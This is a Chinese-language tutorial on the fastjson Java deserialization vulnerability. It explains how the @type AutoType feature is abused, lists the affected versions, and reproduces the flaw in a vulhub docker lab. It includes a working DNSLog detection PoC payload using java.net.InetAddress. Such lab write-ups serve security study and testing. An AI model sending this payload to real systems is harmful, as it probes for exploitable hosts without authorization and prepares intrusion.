一、漏洞原理
fastjson 是一个 有阿里开发的一个开源Java 类库,可以将 Java 对象转换为 JSON 格式(序列化),当然它也可以将 JSON 字符串转换为 Java 对象(反序列化)。Fastjson 可以操作任何 Java 对象,即使是一些预先存在的没有源码的对象。
fastjson的漏洞本质还是一个java的反序列化漏洞,由于引进了AutoType功能,fastjson在序列化以及反序列化的过程中并没有使用Java自带的序列化机制,而是自定义了一套机制。
fastjson在对json字符串反序列化的时候,会读取到@type的内容,将json内容反序列化为java对象并调用这个类的setter方法。fastjson引入了基于属性(AutoType),即在序列化的时候,先把原始类型记录下来。使用@type的键记录原始类型。
使用AutoType功能进行序列号的JSON字符会带有一个@type来标记其字符的原始类型,在反序列化的时候会读取这个@type,来试图把JSON内容反序列化到对象,并且会调用这个库的setter或者getter方法,然而,@type的类有可能被恶意构造,只需要合理构造一个JSON,使用@type指定一个想要的攻击类库就可以实现攻击。
二、影响版本
fastjson 1.2.80及之前的版本
三、vulhub漏洞复现
复现fastjson1.2.24。进入对应的目录后,输入如下命令启动靶场:
docker-compose up –d
访问8090端口
抓取数据包,
1.将数据提交方式改为POST
2.修改content-type修改为application/json
3.在dnslog.cn平台申请一个回显地址
4.数据包内插入以下poc,记得修改dnslog
{"name":{"@type":"java.net.InetAddress","val":"example.com"}}
dnslog平台返回数据,说明代码已近被解析,poc验证成功,漏洞存在